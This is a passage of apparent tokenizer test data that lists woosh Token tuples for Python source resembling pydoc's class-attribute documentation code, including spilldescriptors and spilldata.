woosh.Token(woosh.NAME, 'Exception', 1377, 27, 1377, 36),
woosh.Token(woosh.OP, ':', 1377, 36, 1377, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1377, 37, 1378, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 1378, 24, 1378, 79),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 1379, 24, 1379, 37),
woosh.Token(woosh.INDENT, ' ', 1380, 0, 1380, 24),
woosh.Token(woosh.NAME, 'push', 1380, 24, 1380, 28),
woosh.Token(woosh.OP, '(', 1380, 28, 1380, 29),
woosh.Token(woosh.NAME, 'self', 1380, 29, 1380, 33),
woosh.Token(woosh.OP, '.', 1380, 33, 1380, 34),
woosh.Token(woosh.NAME, 'docdata', 1380, 34, 1380, 41),
woosh.Token(woosh.OP, '(', 1380, 41, 1380, 42),
woosh.Token(woosh.NAME, 'value', 1380, 42, 1380, 47),
woosh.Token(woosh.OP, ',', 1380, 47, 1380, 48),
woosh.Token(woosh.NAME, 'name', 1380, 49, 1380, 53),
woosh.Token(woosh.OP, ',', 1380, 53, 1380, 54),
woosh.Token(woosh.NAME, 'mod', 1380, 55, 1380, 58),
woosh.Token(woosh.OP, ')', 1380, 58, 1380, 59),
woosh.Token(woosh.OP, ')', 1380, 59, 1380, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1380, 60, 1381, 0),
woosh.Token(woosh.DEDENT, ' ', 1381, 0, 1381, 20),
woosh.Token(woosh.NAME, 'else', 1381, 20, 1381, 24),
woosh.Token(woosh.OP, ':', 1381, 24, 1381, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1381, 25, 1382, 0),
woosh.Token(woosh.INDENT, ' ', 1382, 0, 1382, 24),
woosh.Token(woosh.NAME, 'push', 1382, 24, 1382, 28),
woosh.Token(woosh.OP, '(', 1382, 28, 1382, 29),
woosh.Token(woosh.NAME, 'self', 1382, 29, 1382, 33),
woosh.Token(woosh.OP, '.', 1382, 33, 1382, 34),
woosh.Token(woosh.NAME, 'document', 1382, 34, 1382, 42),
woosh.Token(woosh.OP, '(', 1382, 42, 1382, 43),
woosh.Token(woosh.NAME, 'value', 1382, 43, 1382, 48),
woosh.Token(woosh.OP, ',', 1382, 48, 1382, 49),
woosh.Token(woosh.NAME, 'name', 1383, 40, 1383, 44),
woosh.Token(woosh.OP, ',', 1383, 44, 1383, 45),
woosh.Token(woosh.NAME, 'mod', 1383, 46, 1383, 49),
woosh.Token(woosh.OP, ',', 1383, 49, 1383, 50),
woosh.Token(woosh.NAME, 'object', 1383, 51, 1383, 57),
woosh.Token(woosh.OP, ')', 1383, 57, 1383, 58),
woosh.Token(woosh.OP, ')', 1383, 58, 1383, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1383, 59, 1384, 0),
woosh.Token(woosh.DEDENT, ' ', 1384, 0, 1384, 12),
woosh.Token(woosh.DEDENT, '', 1384, 12, 1384, 12),
woosh.Token(woosh.DEDENT, '', 1384, 12, 1384, 12),
woosh.Token(woosh.NAME, 'return', 1384, 12, 1384, 18),
woosh.Token(woosh.NAME, 'attrs', 1384, 19, 1384, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1384, 24, 1385, 0),
woosh.Token(woosh.DEDENT, ' ', 1386, 0, 1386, 8),
woosh.Token(woosh.NAME, 'def', 1386, 8, 1386, 11),
woosh.Token(woosh.NAME, 'spilldescriptors', 1386, 12, 1386, 28),
woosh.Token(woosh.OP, '(', 1386, 28, 1386, 29),
woosh.Token(woosh.NAME, 'msg', 1386, 29, 1386, 32),
woosh.Token(woosh.OP, ',', 1386, 32, 1386, 33),
woosh.Token(woosh.NAME, 'attrs', 1386, 34, 1386, 39),
woosh.Token(woosh.OP, ',', 1386, 39, 1386, 40),
woosh.Token(woosh.NAME, 'predicate', 1386, 41, 1386, 50),
woosh.Token(woosh.OP, ')', 1386, 50, 1386, 51),
woosh.Token(woosh.OP, ':', 1386, 51, 1386, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1386, 52, 1387, 0),
woosh.Token(woosh.INDENT, ' ', 1387, 0, 1387, 12),
woosh.Token(woosh.NAME, 'ok', 1387, 12, 1387, 14),
woosh.Token(woosh.OP, ',', 1387, 14, 1387, 15),
woosh.Token(woosh.NAME, 'attrs', 1387, 16, 1387, 21),
woosh.Token(woosh.OP, '=', 1387, 22, 1387, 23),
woosh.Token(woosh.NAME, '_split_list', 1387, 24, 1387, 35),
woosh.Token(woosh.OP, '(', 1387, 35, 1387, 36),
woosh.Token(woosh.NAME, 'attrs', 1387, 36, 1387, 41),
woosh.Token(woosh.OP, ',', 1387, 41, 1387, 42),
woosh.Token(woosh.NAME, 'predicate', 1387, 43, 1387, 52),
woosh.Token(woosh.OP, ')', 1387, 52, 1387, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1387, 53, 1388, 0),
woosh.Token(woosh.NAME, 'if', 1388, 12, 1388, 14),
woosh.Token(woosh.NAME, 'ok', 1388, 15, 1388, 17),
woosh.Token(woosh.OP, ':', 1388, 17, 1388, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1388, 18, 1389, 0),
woosh.Token(woosh.INDENT, ' ', 1389, 0, 1389, 16),
woosh.Token(woosh.NAME, 'hr', 1389, 16, 1389, 18),
woosh.Token(woosh.OP, '.', 1389, 18, 1389, 19),
woosh.Token(woosh.NAME, 'maybe', 1389, 19, 1389, 24),
woosh.Token(woosh.OP, '(', 1389, 24, 1389, 25),
woosh.Token(woosh.OP, ')', 1389, 25, 1389, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1389, 26, 1390, 0),
woosh.Token(woosh.NAME, 'push', 1390, 16, 1390, 20),
woosh.Token(woosh.OP, '(', 1390, 20, 1390, 21),
woosh.Token(woosh.NAME, 'msg', 1390, 21, 1390, 24),
woosh.Token(woosh.OP, ')', 1390, 24, 1390, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1390, 25, 1391, 0),
woosh.Token(woosh.NAME, 'for', 1391, 16, 1391, 19),
woosh.Token(woosh.NAME, 'name', 1391, 20, 1391, 24),
woosh.Token(woosh.OP, ',', 1391, 24, 1391, 25),
woosh.Token(woosh.NAME, 'kind', 1391, 26, 1391, 30),
woosh.Token(woosh.OP, ',', 1391, 30, 1391, 31),
woosh.Token(woosh.NAME, 'homecls', 1391, 32, 1391, 39),
woosh.Token(woosh.OP, ',', 1391, 39, 1391, 40),
woosh.Token(woosh.NAME, 'value', 1391, 41, 1391, 46),
woosh.Token(woosh.NAME, 'in', 1391, 47, 1391, 49),
woosh.Token(woosh.NAME, 'ok', 1391, 50, 1391, 52),
woosh.Token(woosh.OP, ':', 1391, 52, 1391, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1391, 53, 1392, 0),
woosh.Token(woosh.INDENT, ' ', 1392, 0, 1392, 20),
woosh.Token(woosh.NAME, 'push', 1392, 20, 1392, 24),
woosh.Token(woosh.OP, '(', 1392, 24, 1392, 25),
woosh.Token(woosh.NAME, 'self', 1392, 25, 1392, 29),
woosh.Token(woosh.OP, '.', 1392, 29, 1392, 30),
woosh.Token(woosh.NAME, 'docdata', 1392, 30, 1392, 37),
woosh.Token(woosh.OP, '(', 1392, 37, 1392, 38),
woosh.Token(woosh.NAME, 'value', 1392, 38, 1392, 43),
woosh.Token(woosh.OP, ',', 1392, 43, 1392, 44),
woosh.Token(woosh.NAME, 'name', 1392, 45, 1392, 49),
woosh.Token(woosh.OP, ',', 1392, 49, 1392, 50),
woosh.Token(woosh.NAME, 'mod', 1392, 51, 1392, 54),
woosh.Token(woosh.OP, ')', 1392, 54, 1392, 55),
woosh.Token(woosh.OP, ')', 1392, 55, 1392, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1392, 56, 1393, 0),
woosh.Token(woosh.DEDENT, ' ', 1393, 0, 1393, 12),
woosh.Token(woosh.DEDENT, '', 1393, 12, 1393, 12),
woosh.Token(woosh.NAME, 'return', 1393, 12, 1393, 18),
woosh.Token(woosh.NAME, 'attrs', 1393, 19, 1393, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1393, 24, 1394, 0),
woosh.Token(woosh.DEDENT, ' ', 1395, 0, 1395, 8),
woosh.Token(woosh.NAME, 'def', 1395, 8, 1395, 11),
woosh.Token(woosh.NAME, 'spilldata', 1395, 12, 1395, 21),
woosh.Token(woosh.OP, '(', 1395, 21, 1395, 22),
woosh.Token(woosh.NAME, 'msg', 1395, 22, 1395, 25),
woosh.Token(woosh.OP, ',', 1395, 25, 1395, 26),
woosh.Token(woosh.NAME, 'attrs', 1395, 27, 1395, 32),
woosh.Token(woosh.OP, ',', 1395, 32, 1395, 33),
woosh.Token(woosh.NAME, 'predicate', 1395, 34, 1395, 43),
woosh.Token(woosh.OP, ')', 1395, 43, 1395, 44),
woosh.Token(woosh.OP, ':', 1395, 44, 1395, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1395, 45, 1396, 0),
woosh.Token(woosh.INDENT, ' ', 1396, 0, 1396, 12),
woosh.Token(woosh.NAME, 'ok', 1396, 12, 1396, 14),
woosh.Token(woosh.OP, ',', 1396, 14, 1396, 15),
woosh.Token(woosh.NAME, 'attrs', 1396, 16, 1396, 21),
woosh.Token(woosh.OP, '=', 1396, 22, 1396, 23),
woosh.Token(woosh.NAME, '_split_list', 1396, 24, 1396, 35),
woosh.Token(woosh.OP, '(', 1396, 35, 1396, 36),
woosh.Token(woosh.NAME, 'attrs', 1396, 36, 1396, 41),
woosh.Token(woosh.OP, ',', 1396, 41, 1396, 42),
woosh.Token(woosh.NAME, 'predicate', 1396, 43, 1396, 52),
woosh.Token(woosh.OP, ')', 1396, 52, 1396, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1396, 53, 1397, 0),
woosh.Token(woosh.NAME, 'if', 1397, 12, 1397, 14),
woosh.Token(woosh.NAME, 'ok', 1397, 15, 1397, 17),
woosh.Token(woosh.OP, ':', 1397, 17, 1397, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1397, 18, 1398, 0),
woosh.Token(woosh.INDENT, ' ', 1398, 0, 1398, 16),
woosh.Token(woosh.NAME, 'hr', 1398, 16, 1398, 18),
woosh.Token(woosh.OP, '.', 1398, 18, 1398, 19),
woosh.Token(woosh.NAME, 'maybe', 1398, 19, 1398, 24),
woosh.Token(woosh.OP, '(', 1398, 24, 1398, 25),
woosh.Token(woosh.OP, ')', 1398, 25, 1398, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1398, 26, 1399, 0),
woosh.Token(woosh.NAME, 'push', 1399, 16, 1399, 20),
woosh.Token(woosh.OP, '(', 1399, 20, 1399, 21),
woosh.Token(woosh.NAME, 'msg', 1399, 21, 1399, 24),
woosh.Token(woosh.OP, ')', 1399, 24, 1399, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1399, 25, 1400, 0),
woosh.Token(woosh.NAME, 'for', 1400, 16, 1400, 19),
woosh.Token(woosh.NAME, 'name', 1400, 20, 1400, 24),
woosh.Token(woosh.OP, ',', 1400, 24, 1400, 25),
woosh.Token(woosh.NAME, 'kind', 1400, 26, 1400, 30),
woosh.Token(woosh.OP, ',', 1400, 30, 1400, 31),
woosh.Token(woosh.NAME, 'homecls', 1400, 32, 1400, 39),
woosh.Token(woosh.OP, ',', 1400, 39, 1400, 40),
woosh.Token(woosh.NAME, 'value', 1400, 41, 1400, 46),
woosh.Token(woosh.NAME, 'in', 1400, 47, 1400, 49),
woosh.Token(woosh.NAME, 'ok', 1400, 50, 1400, 52),
woosh.Token(woosh.OP, ':', 1400, 52, 1400, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1400, 53, 1401, 0),
woosh.Token(woosh.INDENT, ' ', 1401, 0, 1401, 20),
woosh.Token(woosh.NAME, 'doc', 1401, 20, 1401, 23),
woosh.Token(woosh.OP, '=', 1401, 24, 1401, 25),
woosh.Token(woosh.NAME, 'getdoc', 1401, 26, 1401, 32),
woosh.Token(woosh.OP, '(', 1401, 32, 1401, 33),
woosh.Token(woosh.NAME, 'value', 1401, 33, 1401, 38),
woosh.Token(woosh.OP, ')', 1401, 38, 1401, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1401, 39, 1402, 0),
woosh.Token(woosh.NAME, 'try', 1402, 20, 1402, 23),
woosh.Token(woosh.OP, ':', 1402, 23, 1402, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1402, 24, 1403, 0),
woosh.Token(woosh.INDENT, ' ', 1403, 0, 1403, 24),
woosh.Token(woosh.NAME, 'obj', 1403, 24, 1403, 27),
woosh.Token(woosh.OP, '=', 1403, 28, 1403, 29),
woosh.Token(woosh.NAME, 'getattr', 1403, 30, 1403, 37),
woosh.Token(woosh.OP, '(', 1403, 37, 1403, 38),
woosh.Token(woosh.NAME, 'object', 1403, 38, 1403, 44),
woosh.Token(woosh.OP, ',', 1403, 44, 1403, 45),
woosh.Token(woosh.NAME, 'name', 1403, 46, 1403, 50),
woosh.Token(woosh.OP, ')', 1403, 50, 1403, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1403, 51, 1404, 0),
woosh.Token(woosh.DEDENT, ' ', 1404, 0, 1404, 20),
woosh.Token(woosh.NAME, 'except', 1404, 20, 1404, 26),
woosh.Token(woosh.NAME, 'AttributeError', 1404, 27, 1404, 41),
woosh.Token(woosh.OP, ':', 1404, 41, 1404, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1404, 42, 1405, 0),
woosh.Token(woosh.INDENT, ' ', 1405, 0, 1405, 24),
woosh.Token(woosh.NAME, 'obj', 1405, 24, 1405, 27),
woosh.Token(woosh.OP, '=', 1405, 28, 1405, 29),
woosh.Token(woosh.NAME, 'homecls', 1405, 30, 1405, 37),
woosh.Token(woosh.OP, '.', 1405, 37, 1405, 38),
woosh.Token(woosh.NAME, '__dict__', 1405, 38, 1405, 46),
woosh.Token(woosh.OP, '[', 1405, 46, 1405, 47),
woosh.Token(woosh.NAME, 'name', 1405, 47, 1405, 51),
woosh.Token(woosh.OP, ']', 1405, 51, 1405, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1405, 52, 1406, 0),
woosh.Token(woosh.DEDENT, ' ', 1406, 0, 1406, 20),
woosh.Token(woosh.NAME, 'push', 1406, 20, 1406, 24),
woosh.Token(woosh.OP, '(', 1406, 24, 1406, 25),
woosh.Token(woosh.NAME, 'self', 1406, 25, 1406, 29),
woosh.Token(woosh.OP, '.', 1406, 29, 1406, 30),
woosh.Token(woosh.NAME, 'docother', 1406, 30, 1406, 38),
woosh.Token(woosh.OP, '(', 1406, 38, 1406, 39),
woosh.Token(woosh.NAME, 'obj', 1406, 39, 1406, 42),
woosh.Token(woosh.OP, ',', 1406, 42, 1406, 43),
woosh.Token(woosh.NAME, 'name', 1406, 44, 1406, 48),
woosh.Token(woosh.OP, ',', 1406, 48, 1406, 49),
woosh.Token(woosh.NAME, 'mod', 1406, 50, 1406, 53),
woosh.Token(woosh.OP, ',', 1406, 53, 1406, 54),
woosh.Token(woosh.NAME, 'maxlen', 1406, 55, 1406, 61),
woosh.Token(woosh.OP, '=', 1406, 61, 1406, 62),
woosh.Token(woosh.NUMBER, '70', 1406, 62, 1406, 64),
woosh.Token(woosh.OP, ',', 1406, 64, 1406, 65),
woosh.Token(woosh.NAME, 'doc', 1406, 66, 1406, 69),
woosh.Token(woosh.OP, '=', 1406, 69, 1406, 70),
woosh.Token(woosh.NAME, 'doc', 1406, 70, 1406, 73),
woosh.Token(woosh.OP, ')', 1406, 73, 1406, 74),
woosh.Token(woosh.OP, '+', 1406, 75, 1406, 76),
woosh.Token(woosh.STRING, "'\\n'", 1407, 25, 1407, 29),
woosh.Token(woosh.OP, ')', 1407, 29, 1407, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1407, 30, 1408, 0),
woosh.Token(woosh.DEDENT, ' ', 1408, 0, 1408, 12),
woosh.Token(woosh.DEDENT, '', 1408, 12, 1408, 12),
woosh.Token(woosh.NAME, 'return', 1408, 12, 1408, 18),
woosh.Token(woosh.NAME, 'attrs', 1408, 19, 1408, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1408, 24, 1409, 0),
woosh.Token(woosh.DEDENT, ' ', 1410, 0, 1410, 8),
woosh.Token(woosh.NAME, 'attrs', 1410, 8, 1410, 13),
woosh.Token(woosh.OP, '=', 1410, 14, 1410, 15),
woosh.Token(woosh.OP, '[', 1410, 16, 1410, 17),
woosh.Token(woosh.OP, '(', 1410, 17, 1410, 18),
woosh.Token(woosh.NAME, 'name', 1410, 18, 1410, 22),
woosh.Token(woosh.OP, ',', 1410, 22, 1410, 23),
woosh.Token(woosh.NAME, 'kind', 1410, 24, 1410, 28),
woosh.Token(woosh.OP, ',', 1410, 28, 1410, 29),
woosh.Token(woosh.NAME, 'cls', 1410, 30, 1410, 33),
woosh.Token(woosh.OP, ',', 1410, 33, 1410, 34),
woosh.Token(woosh.NAME, 'value', 1410, 35, 1410, 40),
woosh.Token(woosh.OP, ')', 1410, 40, 1410, 41),
woosh.Token(woosh.NAME, 'for', 1411, 17, 1411, 20),
woosh.Token(woosh.NAME, 'name', 1411, 21, 1411, 25),
woosh.Token(woosh.OP, ',', 1411, 25, 1411, 26),
woosh.Token(woosh.NAME, 'kind', 1411, 27, 1411, 31),
woosh.Token(woosh.OP, ',', 1411, 31, 1411, 32),
woosh.Token(woosh.NAME, 'cls', 1411, 33, 1411, 36),
woosh.Token(woosh.OP, ',', 1411, 36, 1411, 37),
woosh.Token(woosh.NAME, 'value', 1411, 38, 1411, 43),
woosh.Token(woosh.NAME, 'in', 1411, 44, 1411, 46),
woosh.Token(woosh.NAME, 'classify_class_attrs', 1411, 47, 1411, 67),
woosh.Token(woosh.OP, '(', 1411, 67, 1411, 68),
woosh.Token(woosh.NAME, 'object', 1411, 68, 1411, 74),
woosh.Token(woosh.OP, ')', 1411, 74, 1411, 75),
woosh.Token(woosh.NAME, 'if', 1412, 17, 1412, 19),
woosh.Token(woosh.NAME, 'visiblename', 1412, 20, 1412, 31),
woosh.Token(woosh.OP, '(', 1412, 31, 1412, 32),
woosh.Token(woosh.NAME, 'name', 1412, 32, 1412, 36),
woosh.Token(woosh.OP, ',', 1412, 36, 1412, 37),
woosh.Token(woosh.NAME, 'obj', 1412, 38, 1412, 41),
woosh.Token(woosh.OP, '=', 1412, 41, 1412, 42),
woosh.Token(woosh.NAME, 'object', 1412, 42, 1412, 48),
woosh.Token(woosh.OP, ')', 1412, 48, 1412, 49),
woosh.Token(woosh.OP, ']', 1412, 49, 1412, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1412, 50, 1413, 0),
woosh.Token(woosh.NAME, 'while', 1414, 8, 1414, 13),
woosh.Token(woosh.NAME, 'attrs', 1414, 14, 1414, 19),
woosh.Token(woosh.OP, ':', 1414, 19, 1414, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1414, 20, 1415, 0),
woosh.Token(woosh.INDENT, ' ', 1415, 0, 1415, 12),
woosh.Token(woosh.NAME, 'if', 1415, 12, 1415, 14),
woosh.Token(woosh.NAME, 'mro', 1415, 15, 1415, 18),
woosh.Token(woosh.OP, ':', 1415, 18, 1415, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1415, 19, 1416, 0),
woosh.Token(woosh.INDENT, ' ', 1416, 0, 1416, 16),
woosh.Token(woosh.NAME, 'thisclass', 1416, 16, 1416, 25),
woosh.Token(woosh.OP, '=', 1416, 26, 1416, 27),
woosh.Token(woosh.NAME, 'mro', 1416, 28, 1416, 31),
woosh.Token(woosh.OP, '.', 1416, 31, 1416, 32),
woosh.Token(woosh.NAME, 'popleft', 1416, 32, 1416, 39),
woosh.Token(woosh.OP, '(', 1416, 39, 1416, 40),
woosh.Token(woosh.OP, ')', 1416, 40, 1416, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1416, 41, 1417, 0),
woosh.Token(woosh.DEDENT, ' ', 1417, 0, 1417, 12),
woosh.Token(woosh.NAME, 'else', 1417, 12, 1417, 16),
woosh.Token(woosh.OP, ':', 1417, 16, 1417, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1417, 17, 1418, 0),
woosh.Token(woosh.INDENT, ' ', 1418, 0, 1418, 16),
woosh.Token(woosh.NAME, 'thisclass', 1418, 16, 1418, 25),
woosh.Token(woosh.OP, '=', 1418, 26, 1418, 27),
woosh.Token(woosh.NAME, 'attrs', 1418, 28, 1418, 33),
woosh.Token(woosh.OP, '[', 1418, 33, 1418, 34),
woosh.Token(woosh.NUMBER, '0', 1418, 34, 1418, 35),
woosh.Token(woosh.OP, ']', 1418, 35, 1418, 36),
woosh.Token(woosh.OP, '[', 1418, 36, 1418, 37),
woosh.Token(woosh.NUMBER, '2', 1418, 37, 1418, 38),
woosh.Token(woosh.OP, ']', 1418, 38, 1418, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1418, 39, 1419, 0),
woosh.Token(woosh.DEDENT, ' ', 1419, 0, 1419, 12),
woosh.Token(woosh.NAME, 'attrs', 1419, 12, 1419, 17),
woosh.Token(woosh.OP, ',', 1419, 17, 1419, 18),
woosh.Token(woosh.NAME, 'inherited', 1419, 19, 1419, 28),
woosh.Token(woosh.OP, '=', 1419, 29, 1419, 30),
woosh.Token(woosh.NAME, '_split_list', 1419, 31, 1419, 42),
woosh.Token(woosh.OP, '(', 1419, 42, 1419, 43),
woosh.Token(woosh.NAME, 'attrs', 1419, 43, 1419, 48),
woosh.Token(woosh.OP, ',', 1419, 48, 1419, 49),
woosh.Token(woosh.NAME, 'lambda', 1419, 50, 1419, 56),
woosh.Token(woosh.NAME, 't', 1419, 57, 1419, 58),
woosh.Token(woosh.OP, ':', 1419, 58, 1419, 59),
woosh.Token(woosh.NAME, 't', 1419, 60, 1419, 61),
woosh.Token(woosh.OP, '[', 1419, 61, 1419, 62),
woosh.Token(woosh.NUMBER, '2', 1419, 62, 1419, 63),
woosh.Token(woosh.OP, ']', 1419, 63, 1419, 64),
woosh.Token(woosh.NAME, 'is', 1419, 65, 1419, 67),
woosh.Token(woosh.NAME, 'thisclass', 1419, 68, 1419, 77),
woosh.Token(woosh.OP, ')', 1419, 77, 1419, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1419, 78, 1420, 0),
woosh.Token(woosh.NAME, 'if', 1421, 12, 1421, 14),
woosh.Token(woosh.NAME, 'object', 1421, 15, 1421, 21),
woosh.Token(woosh.NAME, 'is', 1421, 22, 1421, 24),
woosh.Token(woosh.NAME, 'not', 1421, 25, 1421, 28),
woosh.Token(woosh.NAME, 'builtins', 1421, 29, 1421, 37),
woosh.Token(woosh.OP, '.', 1421, 37, 1421, 38),
woosh.Token(woosh.NAME, 'object', 1421, 38, 1421, 44),
woosh.Token(woosh.NAME, 'and', 1421, 45, 1421, 48),
woosh.Token(woosh.NAME, 'thisclass', 1421, 49, 1421, 58),
woosh.Token(woosh.NAME, 'is', 1421, 59, 1421, 61),
woosh.Token(woosh.NAME, 'builtins', 1421, 62, 1421, 70),
woosh.Token(woosh.OP, '.', 1421, 70, 1421, 71),
woosh.Token(woosh.NAME, 'object', 1421, 71, 1421, 77),
woosh.Token(woosh.OP, ':', 1421, 77, 1421, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1421, 78, 1422, 0),
woosh.Token(woosh.INDENT, ' ', 1422, 0, 1422, 16),
woosh.Token(woosh.NAME, 'attrs', 1422, 16, 1422, 21),
woosh.Token(woosh.OP, '=', 1422, 22, 1422, 23),
woosh.Token(woosh.NAME, 'inherited', 1422, 24, 1422, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1422, 33, 1423, 0),
woosh.Token(woosh.NAME, 'continue', 1423, 16, 1423, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1423, 24, 1424, 0),
woosh.Token(woosh.DEDENT, ' ', 1424, 0, 1424, 12),
woosh.Token(woosh.NAME, 'elif', 1424, 12, 1424, 16),
woosh.Token(woosh.NAME, 'thisclass', 1424, 17, 1424, 26),
woosh.Token(woosh.NAME, 'is', 1424, 27, 1424, 29),
woosh.Token(woosh.NAME, 'object', 1424, 30, 1424, 36),
woosh.Token(woosh.OP, ':', 1424, 36, 1424, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1424, 37, 1425, 0),
woosh.Token(woosh.INDENT, ' ', 1425, 0, 1425, 16),
woosh.Token(woosh.NAME, 'tag', 1425, 16, 1425, 19),
woosh.Token(woosh.OP, '=', 1425, 20, 1425, 21),
woosh.Token(woosh.STRING, '"defined here"', 1425, 22, 1425, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1425, 36, 1426, 0),
woosh.Token(woosh.DEDENT, ' ', 1426, 0, 1426, 12),
woosh.Token(woosh.NAME, 'else', 1426, 12, 1426, 16),
woosh.Token(woosh.OP, ':', 1426, 16, 1426, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1426, 17, 1427, 0),
woosh.Token(woosh.INDENT, ' ', 1427, 0, 1427, 16),
woosh.Token(woosh.NAME, 'tag', 1427, 16, 1427, 19),
woosh.Token(woosh.OP, '=', 1427, 20, 1427, 21),
woosh.Token(woosh.STRING, '"inherited from %s"', 1427, 22, 1427, 41),
woosh.Token(woosh.OP, '%', 1427, 42, 1427, 43),
woosh.Token(woosh.NAME, 'classname', 1427, 44, 1427, 53),
woosh.Token(woosh.OP, '(', 1427, 53, 1427, 54),
woosh.Token(woosh.NAME, 'thisclass', 1427, 54, 1427, 63),
woosh.Token(woosh.OP, ',', 1427, 63, 1427, 64),
woosh.Token(woosh.NAME, 'object', 1428, 54, 1428, 60),
woosh.Token(woosh.OP, '.', 1428, 60, 1428, 61),
woosh.Token(woosh.NAME, '__module__', 1428, 61, 1428, 71),
woosh.Token(woosh.OP, ')', 1428, 71, 1428, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1428, 72, 1429, 0),
woosh.Token(woosh.DEDENT, ' ', 1430, 0, 1430, 12),
woosh.Token(woosh.NAME, 'sort_attributes', 1430, 12, 1430, 27),
woosh.Token(woosh.OP, '(', 1430, 27, 1430, 28),
woosh.Token(woosh.NAME, 'attrs', 1430, 28, 1430, 33),
woosh.Token(woosh.OP, ',', 1430, 33, 1430, 34),
woosh.Token(woosh.NAME, 'object', 1430, 35, 1430, 41),
woosh.Token(woosh.OP, ')', 1430, 41, 1430, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1430, 42, 1431, 0),
woosh.Token(woosh.COMMENT, '# Pump out the attrs, segregated by kind.', 1432, 12, 1432, 53),
woosh.Token(woosh.NAME, 'attrs', 1433, 12, 1433, 17),
woosh.Token(woosh.OP, '=', 1433, 18, 1433, 19),
woosh.Token(woosh.NAME, 'spill', 1433, 20, 1433, 25),
woosh.Token(woosh.OP, '(', 1433, 25, 1433, 26),
woosh.Token(woosh.STRING, '"Methods %s:\\n"', 1433, 26, 1433, 41),
woosh.Token(woosh.OP, '%', 1433, 42, 1433, 43),
woosh.Token(woosh.NAME, 'tag', 1433, 44, 1433, 47),
woosh.Token(woosh.OP, ',', 1433, 47, 1433, 48),
woosh.Token(woosh.NAME, 'attrs', 1433, 49, 1433, 54),
woosh.Token(woosh.OP, ',', 1433, 54, 1433, 55),
woosh.Token(woosh.NAME, 'lambda', 1434, 26, 1434, 32),
woosh.Token(woosh.NAME, 't', 1434, 33, 1434, 34),
woosh.Token(woosh.OP, ':', 1434, 34, 1434, 35),
woosh.Token(woosh.NAME, 't', 1434, 36, 1434, 37),
woosh.Token(woosh.OP, '[', 1434, 37, 1434, 38),
woosh.Token(woosh.NUMBER, '1', 1434, 38, 1434, 39),
woosh.Token(woosh.OP, ']', 1434, 39, 1434, 40),
woosh.Token(woosh.OP, '==', 1434, 41, 1434, 43),
woosh.Token(woosh.STRING, "'method'", 1434, 44, 1434, 52),
woosh.Token(woosh.OP, ')', 1434, 52, 1434, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1434, 53, 1435, 0),
woosh.Token(woosh.NAME, 'attrs', 1435, 12, 1435, 17),
woosh.Token(woosh.OP, '=', 1435, 18, 1435, 19),
woosh.Token(woosh.NAME, 'spill', 1435, 20, 1435, 25),
woosh.Token(woosh.OP, '(', 1435, 25, 1435, 26),
woosh.Token(woosh.STRING, '"Class methods %s:\\n"', 1435, 26, 1435, 47),
woosh.Token(woosh.OP, '%', 1435, 48, 1435, 49),
woosh.Token(woosh.NAME, 'tag', 1435, 50, 1435, 53),
woosh.Token(woosh.OP, ',', 1435, 53, 1435, 54),
woosh.Token(woosh.NAME, 'attrs', 1435, 55, 1435, 60),
woosh.Token(woosh.OP, ',', 1435, 60, 1435, 61),
woosh.Token(woosh.NAME, 'lambda', 1436, 26, 1436, 32),
woosh.Token(woosh.NAME, 't', 1436, 33, 1436, 34),
woosh.Token(woosh.OP, ':', 1436, 34, 1436, 35),
woosh.Token(woosh.NAME, 't', 1436, 36, 1436, 37),
woosh.Token(woosh.OP, '[', 1436, 37, 1436, 38),
woosh.Token(woosh.NUMBER, '1', 1436, 38, 1436, 39),
woosh.Token(woosh.OP, ']', 1436, 39, 1436, 40),
woosh.Token(woosh.OP, '==', 1436, 41, 1436, 43),
woosh.Token(woosh.STRING, "'class method'", 1436, 44, 1436, 58),
woosh.Token(woosh.OP, ')', 1436, 58, 1436, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1436, 59, 1437, 0),
woosh.Token(woosh.NAME, 'attrs', 1437, 12, 1437, 17),
woosh.Token(woosh.OP, '=', 1437, 18, 1437, 19),
woosh.Token(woosh.NAME, 'spill', 1437, 20, 1437, 25),
woosh.Token(woosh.OP, '(', 1437, 25, 1437, 26),
woosh.Token(woosh.STRING, '"Static methods %s:\\n"', 1437, 26, 1437, 48),
